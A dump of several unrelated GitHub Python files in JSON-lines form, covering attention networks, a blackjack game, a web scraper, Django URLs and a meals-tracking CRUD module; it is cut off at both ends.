else:\r\n factors = RBTSScores / accScore;\r\n \r\n for i in range(u):\r\n nodeIndex = curNodeList[i];\r\n node = nodeList[nodeIndex];\r\n usersOnNode = indices(curNodeList, nodeIndex);\r\n phiSum = 0;\r\n iotaSum = 0;\r\n for user in usersOnNode:\r\n phiSum += userList[user].ongoingTask[1]\r\n iotaSum += userList[user].ongoingTask[0];\r\n fuk = userList[i].ongoingTask[1] / phiSum \r\n fuk *= 1 - iotaSum / node.BK;\r\n fuk *= node.FK;\r\n fuk *= factors[i];\r\n \r\n lista.append(fuk)\r\n \r\n return np.array(lista);\r\n\r\n\r\ndef computeTimeOverheads(userList, ruks, fuks):\r\n # computing time overheads. ie time to transmit the task\r\n lista = [];\r\n for i in range(len(userList)):\r\n overhead = userList[i].ongoingTask[0] / ruks[i] + userList[i].ongoingTask[2] / fuks[i] \r\n lista.append(overhead);\r\n \r\n return np.array(lista);\r\n\r\ndef computeEnergyOverheads(userList, u, curNodeList, puks, ruks):\r\n # compute the energy overheads ie. the amount of power we spend to complete the task\r\n lista = [];\r\n for i in range(u):\r\n nodeIndex = curNodeList[i];\r\n EO = userList[i].ongoingTask[0] * puks[nodeIndex][i] / ruks[i];\r\n lista.append(EO);\r\n \r\n return np.array(lista);\r\n\r\ndef addIUS(userList):\r\n # return the sum of all Itus from a list of users\r\n sumI = 0;\r\n for user in userList:\r\n sumI += user.ongoingTask[0];\r\n \r\n return sumI;\r\n\r\ndef randomVector(size):\r\n # returns a vector of size @size with random numbers\r\n lista = [];\r\n for i in range(size):\r\n lista.append(random.random());\r\n \r\n return np.array(lista);\r\n\r\ndef RQ(y, x):\r\n # the RQ functions as described in the WriteUp\r\n if x == 1:\r\n return 2 * y - pow(y, 2);\r\n elif x == 0:\r\n return 1 - pow(y,2);\r\n \r\n \r\ndef rewardsRange(normalizedRewards, newMax, newMin):\r\n lista = [];\r\n size = len(normalizedRewards);\r\n \r\n oldMax = max(normalizedRewards);\r\n oldMin = min(normalizedRewards);\r\n \r\n newRange = newMax - newMin;\r\n oldRange = oldMax - oldMin;\r\n \r\n if oldRange == 0:\r\n return np.ones(size) * (newMax + newMin) / 2\r\n \r\n for reward in normalizedRewards:\r\n lista.append((((reward - oldMin) * newRange)/ oldRange) + newMin)\r\n \r\n return np.array(lista)","repo_name":"stavros2/Thesis","sub_path":"src/compFunctions.py","file_name":"compFunctions.py","file_ext":"py","file_size_in_byte":5420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"74346626077","text":"from django.conf.urls import patterns, include, url\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom .views import PersonViewSet, OrganizationViewSet, MembershipViewSet, PostViewSet, AreaViewSet\nfrom .routers import DefaultPopsRouter\n\n# Routers provide an easy way of automatically determining the URL conf\nrouter = DefaultPopsRouter()\n\nrouter.register(r'persons', PersonViewSet)\nrouter.register(r'organizations', OrganizationViewSet)\nrouter.register(r'memberships', MembershipViewSet)\nrouter.register(r'posts', PostViewSet)\nrouter.register(r'areas', AreaViewSet)\n\n\nurlpatterns = patterns('',\n # django-rest-frameworks urls\n url(r'^', include(router.urls)),\n url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n)\n\n","repo_name":"openpolis/op_api3","sub_path":"api_project/pops/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"9635968673","text":"# def search(data,key,min,max):\n# mid = int((min + max) / 2)\n# if data[mid] == key:\n# return mid\n# elif data[mid] > key:\n# max = mid -1\n# return search(data, key, min, max)\n# else:\n# min = mid + 1\n# return search(data, key, min, max)\n\n\ndef search2(data, key):\n min = 0\n max = len(data) - 1\n\n while max >= min:\n mid = int((min+max) / 2)\n if data[mid] == key :\n return mid\n elif data[mid] > key :\n max = mid - 1\n else:\n min = mid + 1\n\n\n\ndata = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\nkey = 7\n\n# print(search(data,7,0,len(data)-1))\n\nprint( search2(data, key))","repo_name":"HSUHAOBM/Python_note","sub_path":"other/practise/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"74038664797","text":"import urllib.request\nimport csv\nimport json\n\nfrom bs4 import BeautifulSoup\n\nSTATES_TO_CODE = {\n 'Alabama': 'AL',\n 'Alaska': 'AK',\n 'American Samoa': 'AS',\n 'Arizona': 'AZ',\n 'Arkansas': 'AR',\n 'California': 'CA',\n 'Colorado': 'CO',\n 'Connecticut': 'CT',\n 'Delaware': 'DE',\n 'District of Columbia': 'DC',\n 'Florida': 'FL',\n 'Georgia': 'GA',\n 'Guam': 'GU',\n 'Hawaii': 'HI',\n 'Idaho': 'ID',\n 'Illinois': 'IL',\n 'Indiana': 'IN',\n 'Iowa': 'IA',\n 'Kansas': 'KS',\n 'Kentucky': 'KY',\n 'Louisiana': 'LA',\n 'Maine': 'ME',\n 'Maryland': 'MD',\n 'Massachusetts': 'MA',\n 'Michigan': 'MI',\n 'Minnesota': 'MN',\n 'Mississippi': 'MS',\n 'Missouri': 'MO',\n 'Montana': 'MT',\n 'Nebraska': 'NE',\n 'Nevada': 'NV',\n 'New Hampshire': 'NH',\n 'New Jersey': 'NJ',\n 'New Mexico': 'NM',\n 'New York': 'NY',\n 'North Carolina': 'NC',\n 'North Dakota': 'ND',\n 'Northern Mariana Islands':'MP',\n 'Ohio': 'OH',\n 'Oklahoma': 'OK',\n 'Oregon': 'OR',\n 'Pennsylvania': 'PA',\n 'Puerto Rico': 'PR',\n 'Rhode Island': 'RI',\n 'South Carolina': 'SC',\n 'South Dakota': 'SD',\n 'Tennessee': 'TN',\n 'Texas': 'TX',\n 'Utah': 'UT',\n 'Vermont': 'VT',\n 'Virgin Islands': 'VI',\n 'Virginia': 'VA',\n 'Washington': 'WA',\n 'West Virginia': 'WV',\n 'Wisconsin': 'WI',\n 'Wyoming': 'WY'\n}\n\nMOVEMENTVOTE_URL = \"https://movement.vote/groups\" # this is a gatsby site, so doesn't have the full body hydrated\n# loaded it in a real browser and then saved to \nMOVEMENTVOTE_FILE = \"movementvote.html\"\nREQUEST_HEADERS = {'User-Agent' : \"bot\"}\nDESIRED_FIELDS = ['name', 'state', 'description', 'website', 'donation_url', 'logo_url', 'issues']\n\ndef get_page(url):\n request = urllib.request.Request(url, headers=REQUEST_HEADERS)\n connect = urllib.request.urlopen(request)\n return BeautifulSoup(connect.read(), 'html.parser')\n\ndef get_data(doc):\n data = []\n orgs_section = doc.find(\"section\", {\"class\": \"orgs-section\"})\n orgs_list = orgs_section.find(\"div\", {\"class\": \"orgs-list\"})\n for org in orgs_list.find_all(\"div\", {\"class\" : \"org\"}):\n state_name = org.find(\"div\", {\"class\": \"org-states\"}).get_text().strip()\n state_name = state_name.replace(\"National Groups\", \"\").replace(',','').strip()\n state = STATES_TO_CODE.get(state_name)\n name = org.find(\"div\", {\"class\": \"org-title\"}).get_text().strip()\n description = org.find(\"div\", {\"class\": \"org-content\"}).get_text().strip()\n image = org.find(\"img\", {\"class\": \"org-image\"})\n website = org.find(\"a\", {\"class\": \"org-link-web\"}, href=True)\n donate = org.find('a', {\"class\": \"org-link-donate\"}, href=True)\n org_tags = org.find(\"div\", {\"class\": \"org-tags\"})\n\n d = {\n 'name': name,\n 'state': state,\n 'description': description\n }\n if image:\n d['logo_url'] = image['src']\n if website:\n d['website'] = website['href']\n if donate:\n d['donation_url'] = donate['href'].replace('refcode=mvpsite', 'refcode=crush2020')\n if org_tags:\n first_tag = org_tags.find(\"div\", {\"class\": \"tagblock\"})\n if first_tag and first_tag.get_text().startswith(\"Issue Areas:\"):\n issues = first_tag.get_text().replace(\"Issue Areas: \", \"\").strip()\n d['issues'] = issues\n \n data.append(d)\n print(len(data))\n return data\n\ndef write_page(data, writer):\n for row in data:\n out_row = {k: v for k, v in row.items() if k in DESIRED_FIELDS}\n writer.writerow(out_row)\n\nwith open('../movementvote.csv', 'w') as out_file:\n out_writer = csv.DictWriter(out_file, fieldnames=DESIRED_FIELDS)\n out_writer.writeheader()\n\n # doc = get_page(MOVEMENTVOTE_URL)\n file = open(MOVEMENTVOTE_FILE, 'r')\n doc = BeautifulSoup(file.read(), 'html.parser')\n write_page(get_data(doc), out_writer)\n\n print(\"done\")\n","repo_name":"spacedogXYZ/crush2020","sub_path":"data/scripts/get_movementvote.py","file_name":"get_movementvote.py","file_ext":"py","file_size_in_byte":3994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73043699039","text":"import random\r\nimport os\r\n\r\nlogo = \"\"\"\r\n.------. _ _ _ _ _ \r\n|A_ _ |. | | | | | | (_) | | \r\n|( \\/ ).-----. | |__ | | __ _ ___| | ___ __ _ ___| | __\r\n| \\ /|K /\\ | | '_ \\| |/ _` |/ __| |/ / |/ _` |/ __| |/ /\r\n| \\/ | / \\ | | |_) | | (_| | (__| <| | (_| | (__| < \r\n`-----| \\ / | |_.__/|_|\\__,_|\\___|_|\\_\\ |\\__,_|\\___|_|\\_\\\\\r\n | \\/ K| _/ | \r\n `------' |__/ \r\n\"\"\"\r\n\r\ndef deal_card():\r\n \"\"\"Returns a random card from the deck.\"\"\"\r\n cards = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10]\r\n card = random.choice(cards)\r\n return card\r\n\r\n\r\ndef calculate_score(cards):\r\n if sum(cards) == 21 and len(cards) == 2:\r\n return 0\r\n if 11 in cards and sum(cards) > 21:\r\n cards.remove(11)\r\n cards.append(1)\r\n return sum(cards)\r\n\r\n\r\ndef compare(user_score, computer_score):\r\n if user_score == computer_score:\r\n return \"Its a DRAW 😶\"\r\n elif computer_score == 0:\r\n return \"Loose! Opponent has a blackjack\"\r\n elif user_score == 0:\r\n return \"Win with a blackjack 😎\"\r\n elif user_score > 21:\r\n return \"You went over. You lose!\"\r\n elif computer_score > 21:\r\n return \"Opponent went over. You WIN\"\r\n elif user_score > computer_score:\r\n return \"You win 🙂\"\r\n else:\r\n return \"You lose 😯\"\r\n\r\n\r\ndef play_game():\r\n print(logo)\r\n user_cards = []\r\n computer_cards = []\r\n con_game = True\r\n\r\n for _ in range(2):\r\n user_cards.append(deal_card())\r\n computer_cards.append(deal_card())\r\n\r\n while con_game:\r\n user_score = calculate_score(user_cards)\r\n computer_score = calculate_score(computer_cards)\r\n print(f\" Your cards: {user_cards}, score is: {user_score}\")\r\n print(f\" The computer's first card: {computer_cards[0]}\")\r\n if user_score == 0 or computer_score == 0 or user_score > 21:\r\n con_game = False\r\n else:\r\n user_should_deal = input(\"Type 'y' to take a new card or 'n' to pass: \")\r\n if user_should_deal == 'y':\r\n user_cards.append(deal_card())\r\n else:\r\n con_game = False\r\n\r\n while computer_score != 0 and computer_score < 17:\r\n computer_cards.append(deal_card())\r\n computer_score = calculate_score(computer_cards)\r\n\r\n print(f\"Your final hand is: {user_cards} and score is: {user_score}\")\r\n print(f\"The opponent's final hand is: {computer_cards} and score is: {computer_score}\")\r\n print(compare(user_score, computer_score))\r\n\r\n\r\nwhile input(\"Do you want to play a game of blackjack? Type 'y' or 'n': \") == 'y':\r\n os.system('cls')\r\n play_game()","repo_name":"aleesain/python","sub_path":"mini_game_blackjack.py","file_name":"mini_game_blackjack.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"38356148980","text":"\"\"\"\nThis file contains the self attention and the multi attention modules\n\nDescription :\nThe Network being implemented here produces context aware representation by applying attention to\neach pair of tokens from the input sequence\n\nThe idea is to use this network to predict the top n goals to use\nfor resubstitution in the Hindsight experience replay\n\n\"\"\"\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\ndef multiplicative_fn( x, q, linear_x, linear_q):\n \"\"\"\n\n :param x: Input token\n :param q: Query vector\n :param linear_x: Weight matrix for x\n :param linear_q: Weight matrix for query\n :return: compatibility function\n \"\"\"\n\n # Return the cosine similarity\n x_ = linear_x(x)\n q_ = linear_q(q)\n f = F.cosine_similarity(x_, q_)\n return f\n\n\ndef additive_fn( x, q, linear_x, linear_q, out_linear, num_hidden, activation):\n \"\"\"\n\n :param x: Input token\n :param q: Query vector\n :param linear_x: Weight matrix for x\n :param linear_q: Weight matrix for query\n :param num_hidden: Number of hidden layers\n :param activation: The Non linear activation function to use\n :return: compatibility function\n \"\"\"\n\n # Additive attention achieves better empirical performance\n x_ = linear_x(x)\n q_ = linear_q(q)\n o = out_linear(activation(x_ + q_))\n return o\n\n\nclass VanillaAttention(nn.Module):\n \"\"\"\n The standard attention module\n Vanilla Attention computes alignments scores of the query to each\n of the input tokens in an input sequence.\n \"\"\"\n def __init__(self, input_dim, query_dim, num_hidden, embedding_dim,\n activation, output_features,\n use_additive=True, save_attention=False,\n attention_dict=None, name=None):\n \"\"\"\n\n :param input_dim: The input dimension of the sequence or length of the sequence\n :param query_dim: The dimension of the query embedding - Current State || Desired Goal Vector\n :param num_hidden: The number of hidden layers in the network\n :param embedding_dim: The dimension of each embedding - State || Achieved Goal Vector\n :param activation: The non-linear activation function to use\n :param use_additive_fn: Boolean to determine whether to use additive or multiplicative attention\n \"\"\"\n super(VanillaAttention, self).__init__()\n self.input_dim = input_dim # n\n self.query_dim = query_dim # q\n self.num_hidden = num_hidden # h\n self.embedding_dim = embedding_dim # e\n self.output = output_features\n self.additive = use_additive\n self.activation = activation\n self.save_attention = save_attention\n self.attention_dict = attention_dict\n self.name = name\n\n # Define the linear layers\n self.linear_x = nn.Linear(in_features=embedding_dim, out_features=num_hidden)\n self.linear_q = nn.Linear(in_features=query_dim, out_features=num_hidden)\n self.out_linear = nn.Linear(in_features=num_hidden, out_features=output_features)\n self.output_softmax_scores = nn.Softmax()\n\n def forward(self, input_sequence, query_vector):\n # Returns the alignment scores\n if self.additive:\n s = additive_fn(x=input_sequence, q=query_vector, linear_x=self.linear_x,\n linear_q=self.linear_q, num_hidden=self.num_hidden, activation=self.activation,\n out_linear=self.out_linear)\n else:\n s = multiplicative_fn(x=input_sequence, q=query_vector, linear_x=self.linear_x,\n linear_q=self.linear_q)\n\n scores = self.output_softmax_scores(s)\n # A large score here for a particular x (embedding) means that it contributes\n # important information to the given query vector\n # Dimension of scores -> b x n\n expectations_of_sampling = torch.sum(torch.mul(scores, input_sequence))\n if self.save_attention:\n if self.name is not None and self.attention_dict is not None:\n self.attention_dict[self.name] = scores\n return scores, expectations_of_sampling\n\n # Weights Initialization\n def init_weights(self, init_range=0.1):\n self.linear_x.weight.data.uniform_(-init_range, init_range)\n self.linear_q.weight.data.uniform_(-init_range, init_range)\n self.out_linear.weight.data.uniform(-init_range, init_range)\n\n\nclass MultiAttention(nn.Module):\n \"\"\"\n The Mutli Attention module\n\n Alignment Score computed for each feature\n\n Score of a token pair is vector rather than a scalar\n\n Has embedding_dim indicators for embedding_dim features\n Each indicator has a probability\n distribution that is generated by applying softmax to\n the n alignment scores of the corresponding feature.\n\n\n \"\"\"\n def __init__(self, input_dim, embedding_dim, query_dim, num_hidden,\n activation, output_features,\n use_additive=True, save_attention=False,\n attention_dict=None, name=None):\n \"\"\"\n :param input_dim: The input dimension of the sequence or length of the sequence\n :param query_dim: The dimension of the query embedding - Current State || Desired Goal Vector\n :param num_hidden: The number of hidden layers in the network\n :param embedding_dim: The dimension of each embedding - State || Achieved Goal Vector\n :param activation: The non-linear activation function to use\n :param use_additive_fn: Boolean to determine whether to use additive or multiplicative attention\n \"\"\"\n super(MultiAttention, self).__init__()\n self.input_dim = input_dim\n self.query_dim = query_dim\n self.embedding_dim = embedding_dim\n self.num_hidden = num_hidden\n self.activation = activation\n self.additive = use_additive\n self.out_features = output_features\n self.save_attention = save_attention\n self.attention_dict = attention_dict\n self.name = name\n\n # Define the linear layers\n self.linear_x = nn.Linear(in_features=embedding_dim, out_features=num_hidden)\n self.linear_q = nn.Linear(in_features=query_dim, out_features=num_hidden)\n self.out_linear = nn.Linear(in_features=num_hidden, out_features=embedding_dim)\n self.output_softmax_scores = nn.Softmax()\n\n def forward(self, input_sequence, query_vector):\n if self.additive:\n s = additive_fn(x=input_sequence, q=query_vector, linear_x=self.linear_x,\n linear_q=self.linear_q, num_hidden=self.num_hidden, activation=self.activation,\n out_linear=self.out_linear)\n else:\n s = multiplicative_fn(x=input_sequence, q=query_vector, linear_x=self.linear_x,\n linear_q=self.linear_q)\n\n prob_distribution = self.output_softmax_scores(s)\n score_vectors = torch.sum(torch.bmm(prob_distribution, input_sequence))\n if self.save_attention:\n if self.attention_dict is not None and self.name is not None:\n self.attention_dict[self.name] = prob_distribution\n return score_vectors, prob_distribution\n\n # Weights Initialization\n def init_weights(self, init_range=0.1):\n self.linear_x.weight.data.uniform_(-init_range, init_range)\n self.linear_q.weight.data.uniform_(-init_range, init_range)\n self.out_linear.weight.data.uniform(-init_range, init_range)\n\n\nclass SelfAttention(nn.Module):\n \"\"\"\n The Self Attention module produces context-aware representations by\n exploring the dependency between two tokens xi and xj from the same sequence x.\n\n \"\"\"\n def __init__(self, input_dim, embedding_dim, query_dim, num_hidden,\n output_features, activation, use_additive=True,\n token2token=True, seq2token=False, attention_dict=None,\n save_attention=False, name=None):\n \"\"\"\n\n :param input_dim:\n :param embedding_dim:\n :param query_dim:\n :param num_hidden:\n :param activation:\n :param use_additive:\n :param token2token:\n :param seq2token:\n \"\"\"\n super(SelfAttention, self).__init__()\n self.token2token = token2token\n self.seq2token = seq2token\n self.input_dim = input_dim\n self.embedding_dim = embedding_dim\n self.query_dim = query_dim\n self.num_hidden = num_hidden\n self.out_features = output_features\n self.activation = activation\n self.additive = use_additive\n self.attention_dict = attention_dict\n self.save_attention = save_attention\n self.name = name\n\n # Define the linear layers\n self.linear_x = nn.Linear(in_features=self.embedding_dim, out_features=self.num_hidden)\n self.linear_q = nn.Linear(in_features=self.query_dim, out_features=self.num_hidden)\n self.out_linear = nn.Linear(in_features=self.num_hidden, out_features=self.out_features)\n self.softmax_probs = nn.Softmax()\n\n def forward(self, input_sequence):\n # In this case the query vector itself is the input sequence\n\n # Dimensions of the vectors\n # Input Dimension -> B x Seq Length x embedding_dim\n # Query Vector Dimension -> B x Seq Length x embedding_dim\n\n x = input_sequence\n query_vector = input_sequence\n\n # Dimension of x and query after linear_x and linear_q respectively\n # B x Seq Length x hidden_dim\n x_ = self.linear_x(x)\n q_ = self.linear_q(query_vector)\n\n t = nn.ReLU(x_ + q_)\n\n # Dimension of t after out_linear\n # B x Seq Length x embedding_dim\n o = self.out_linear(t)\n\n # Softmax Scores\n scores = self.softmax_probs(o)\n # Dimension of expectation of the sampling\n # B x seq length (Contrary to the paper, we are summing along the embedding dimension)\n expectation_of_sampling = torch.sum(torch.mul(scores), dim=-1)\n\n if self.save_attention:\n if self.attention_dict is not None and self.name is not None:\n self.attention_dict[self.name] = scores\n\n return scores, expectation_of_sampling\n\n # Weights Initialization\n def init_weights(self, init_range=0.1):\n self.linear_x.weight.data.uniform_(-init_range, init_range)\n self.linear_q.weight.data.uniform_(-init_range, init_range)\n self.out_linear.weight.data.uniform(-init_range, init_range)\n\n\nclass GoalNetwork(nn.Module):\n \"\"\"\n This network uses the self, multi and vanilla attention modules and returns the\n top n vectors according to the softmax probabilities.\n \"\"\"\n\n def __init__(self, input_dim, query_dim, embedding_dim, num_hidden,\n output_features, activation, use_additive, use_token2token,\n use_self_attn, save_attention=False, attention_dict=None,\n use_multi_attn=False):\n \"\"\"\n\n :param input_dim:\n :param query_dim:\n :param embedding_dim:\n :param num_hidden:\n :param output_features:\n :param activation:\n :param use_additive:\n :param use_token2token:\n :param use_self_attn:\n :param save_attention:\n :param attention_dict:\n \"\"\"\n super(GoalNetwork, self).__init__()\n self.input_dim = input_dim\n self.query_dim = query_dim\n self.embedding_dim = embedding_dim\n self.num_hidden = num_hidden\n self.output_features = output_features\n self.activation = activation\n self.additive = use_additive\n self.use_self_attn = use_self_attn\n self.token2token = use_token2token\n self.save_attn = save_attention\n self.attention_dict = attention_dict\n self.multi_attn = use_multi_attn\n self.self_attn = None\n self.self_linear = None\n\n if self.use_self_attn:\n self.self_attn = SelfAttention(input_dim=self.input_dim, embedding_dim=self.embedding_dim,\n query_dim=self.query_dim, num_hidden=self.num_hidden,\n output_features=self.embedding_dim, activation=self.activation,\n use_additive=self.additive, token2token=self.token2token,\n save_attention=self.save_attn, attention_dict=self.attention_dict,\n name='SelfAttention')\n self.self_linear = nn.Linear(in_features=1, out_features=self.num_hidden)\n\n if self.multi_attn:\n # Use multi dimensional attention\n self.attn = MultiAttention(input_dim=self.input_dim, embedding_dim=self.embedding_dim,\n query_dim=self.query_dim, num_hidden=self.num_hidden,\n output_features=self.embedding_dim, activation=self.activation,\n use_additive=self.additive,\n save_attention=self.save_attn, attention_dict=self.attention_dict,\n name='MultiAttention')\n\n else:\n # Use the traditional vanilla attention\n self.attn = VanillaAttention(input_dim=self.input_dim, embedding_dim=self.embedding_dim,\n query_dim=self.query_dim, num_hidden=self.num_hidden,\n output_features=1, activation=self.activation,\n use_additive=self.additive,\n save_attention=self.save_attn, attention_dict=self.attention_dict,\n name='VanillaAttention')\n\n self.linear_attn = nn.Linear(in_features=1, out_features=self.num_hidden)\n self.output_linear = nn.Linear(in_features=num_hidden, out_features=1)\n\n def forward(self, input_sequence, current_embedding):\n scores_self, expectations_self = None, None\n if self.self_attn is not None:\n scores_self, expectations_self = self.self_attn(input_sequence)\n scores, expectation = self.attn(input_sequence, current_embedding)\n if expectations_self is not None and self.self_linear is not None:\n expectations_self = self.self_linear(expectations_self)\n expectation = self.linear_attn(expectation)\n if expectations_self is not None:\n e = expectation + expectations_self\n else:\n e = expectation\n e = self.activation(e)\n o = self.output_linear(e)\n return o\n\n\n\n\n\n","repo_name":"navneet-nmk/pytorch-rl","sub_path":"models/attention.py","file_name":"attention.py","file_ext":"py","file_size_in_byte":14735,"program_lang":"python","lang":"en","doc_type":"code","stars":438,"dataset":"github-code","pt":"51"} +{"seq_id":"2173185018","text":"#!/usr/bin/env python3\n# encoding: utf-8\nimport matplotlib.pyplot as plt\n\n\"\"\"\n图中图\nhttps://morvanzhou.github.io/tutorials/data-manipulation/plt/4-3-plot-in-plot/\n\"\"\"\n# 大图\nfig = plt.figure()\nx = [1, 2, 3, 4, 5, 6, 7]\ny = [1, 3, 4, 2, 5, 8, 6]\n# 4个值都是占整个figure坐标系的百分比。在这里,假设figure的大小是10x10,那么大图就被包含在由(1, 1)开始,宽8,高8的坐标系内\nleft, bottom, width, height = 0.1, 0.1, 0.8, 0.8\nax1 = fig.add_axes([left, bottom, width, height])\nax1.plot(x, y, 'r')\nax1.set_xlabel('x')\nax1.set_ylabel('y')\nax1.set_title('title')\n\n# 小图\nleft, bottom, width, height = 0.2, 0.6, 0.25, 0.25\nax2 = fig.add_axes([left, bottom, width, height])\nax2.plot(x, y, 'b')\nax2.set_xlabel('x')\nax2.set_ylabel('y')\nax2.set_title('title inside 1')\n\nplt.axes([0.6, 0.2, 0.25, 0.25])\nplt.plot(y[::-1], x, 'g') # 注意对y进行了逆序处理\nplt.xlabel('x')\nplt.ylabel('y')\nplt.title('title inside 2')\nplt.show()\n","repo_name":"wildape/PythonPractice","sub_path":"plt/4_3_plot_in_plot.py","file_name":"4_3_plot_in_plot.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"4290392482","text":"import os\nimport configparser\n\nROOT_PATH = '/home/mnk/MegNav/Projects/Face-Recognition-from-crowd'\n\n\ndef path2src(path, num=0):\n ext = path.split(\".\")[-1]\n if ext == \"mp4\" or ext == \"avi\":\n return \"video\"\n elif ext == \"jpg\" or ext == \"png\":\n return \"image\"\n elif path == \"live\":\n if num==1:\n return 0\n return \"live\"\n else:\n raise Exception(\"Invalid source\")\n\ndef absolute_path(path):\n return os.path.abspath(path)\n\n# Congifuration file\ndef config_parse(txt):\n config = configparser.ConfigParser()\n path = ROOT_PATH + '/project.cfg'\n config.read(path)\n params={}\n try:\n for key, value in config[txt].items():\n if 'path' in key: \n params[key] = absolute_path(value)\n else:\n params[key] = value\n except KeyError as e:\n print(\"Invalid key: \", e)\n print(path) \n \n return params\n\ndef lists_equal(list1, list2):\n if len(list1) != len(list2):\n return False\n for i in range(len(list1)):\n if list1[i] != list2[i]:\n return False\n return True\n\ndef get_new_faces(list1, list2):\n new_faces = []\n for i in range(len(list1)):\n if list1[i] not in list2:\n new_faces.append(int(list1[i]))\n return new_faces\n","repo_name":"NavinKumarMNK/Face-Recognition-From-Crowd","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"51"} +{"seq_id":"71321707037","text":"# Funções aprofundadas em Python\ndef leiaInt(msg):\n while True:\n try:\n n = int(input(msg))\n except (ValueError, TypeError):\n print('\\033[31mERRO! Por favor, digite um número inteiro válido.\\033[m')\n continue\n except KeyboardInterrupt:\n print('\\033[31mUsuário interrompeu a execução.\\033[m')\n return 0\n else:\n return n\n\n\ndef leiaFloat(msg):\n while True:\n try:\n n = float(input(msg))\n except (ValueError, TypeError):\n print('\\033[31mERRO! Por favor, digite um número real válido.\\033[m')\n continue\n except KeyboardInterrupt:\n print('\\033[31mUsuário interrompeu a execução.\\033[m')\n return 0\n else:\n return n\n\n\nnum = leiaInt('Digite um número inteiro: ')\nvalor = leiaFloat('Digite um número real: ')\nprint(f'O valor inteiro digitado foi \\033[34m{num}\\033[m e o valor real foi \\033[34m{valor}\\033[m')\n","repo_name":"miguelmendesSerrano/curso_python","sub_path":"mundo_3/aula_23/ex113.py","file_name":"ex113.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"71330997917","text":"\"\"\" CRUD operations for meals and macros project \"\"\"\nfrom model import db, User, CaloriesMacros, Diet, Goal, Food, UserQuestions, connect_to_db\n# from model import db, User, connect_to_db \n\ndef create_user(email, password, name, lname):\n \"\"\" create a new user \"\"\"\n\n user = User(email=email, password=password, name=name, lname=lname)\n\n db.session.add(user)\n db.session.commit()\n\n return user \n \ndef get_users():\n \"\"\"Return all users.\"\"\"\n\n return User.query.all()\n\n\ndef get_user_by_id(user_id):\n \"\"\"Return a user by primary key.\"\"\"\n\n return User.query.get(user_id)\n\n\ndef get_user_by_email(email):\n \"\"\"Return a user by email.\"\"\"\n\n return User.query.filter(User.email == email).first()\n\ndef get_all_food(user_id):\n \"\"\" returns all food \"\"\"\n return Food.query.filter(Food.user_id == user_id).all()\n \n \ndef get_food(food_name):\n \"\"\" returns all food \"\"\"\n return Food.query.filter(Food.food_name == food_name).all()\n\ndef create_cals_macros(user, daily_caloric_intake, daily_protein_goal, daily_carb_goal, daily_fat_goal):\n\n \"\"\" create calorie and macros \"\"\"\n\n calories_and_macros = CaloriesMacros(\n user=user,\n daily_caloric_intake=daily_caloric_intake, \n daily_protein_goal=daily_protein_goal, \n daily_carb_goal=daily_carb_goal, \n daily_fat_goal=daily_fat_goal\n )\n\n db.session.add(calories_and_macros)\n db.session.commit()\n\n return calories_and_macros \n\ndef create_diet(diet, user):\n\n \"\"\" create diet preference \"\"\"\n\n diet = Diet(diet=diet, user=user)\n\n db.session.add(diet)\n db.session.commit()\n\n return diet \n\ndef create_goal(user_id, strength, running, weight_loss, consistency, stretching, high_intensity_training, nutrition, overall_health):\n\n \"\"\" create user fitness goal \"\"\"\n\n goal = Goal(\n user_id=user_id,\n strength=strength,\n running=running,\n weight_loss=weight_loss,\n consistency=consistency,\n stretching=stretching, \n high_intensity_training=high_intensity_training,\n nutrition=nutrition,\n overall_health=overall_health\n )\n\n db.session.add(goal)\n db.session.commit()\n\n return goal \n\ndef get_goals(user_id):\n \"\"\" returns all food \"\"\"\n return Goal.query.filter(Goal.user_id == user_id).all()\n\n# def create_meal(user, meal_name, meal_calories, meal_protein, meal_carb, meal_fat):\n\n# \"\"\" create user meals \"\"\"\n\n# meal = User_meals(\n# user=user, \n# meal_name=meal_name, \n# meal_calories=meal_calories, \n# meal_protein=meal_protein, \n# meal_carb=meal_carb,\n# meal_fat=meal_fat,\n# )\n\n# db.session.add(meal)\n# db.session.commit()\n\n# return meal \n\ndef create_food(food_name, calories, fat, carb, protein, user_id):\n\n \"\"\" create food for user to use for tracking \"\"\" \n\n food = Food( \n food_name=food_name,\n calories=calories,\n fat=fat,\n carb=carb,\n protein=protein, \n user_id=user_id\n )\n\n db.session.add(food)\n db.session.commit()\n\n return food\n\ndef create_tracking(user, food, deduct_daily_calroies, deduct_daily_macros):\n\n \"\"\" create tracking for user to enter food throughout the day \"\"\"\n\n tracking = User_tracking(\n user=user,\n food=food,\n deduct_daily_calories=deduct_daily_calories,\n deduct_daily_macros=deduct_daily_macros,\n )\n\n db.session.add(tracking)\n db.session.commit()\n\n return tracking \n\ndef questionare(gender, age, height, weight, activity, user_id):\n\n \"\"\" questionare information \"\"\"\n\n questionare_info = UserQuestions(\n age=age,\n gender=gender,\n height=height,\n weight=weight,\n activity=activity,\n user_id=user_id\n )\n\n db.session.add(questionare_info)\n db.session.commit()\n\n return questionare_info \n\ndef new_calculator(tdee, deficit, macros, user_id, questions_id, protein_goal, fat_goal, carb_goal):\n\n \"\"\"calculate user calories and macros\"\"\"\n\n calculator_info = UserCalculcations(\n tdee=tdee,\n deficit=deficit,\n macros=macros,\n user_id=user_id,\n questions_id=questions_id,\n 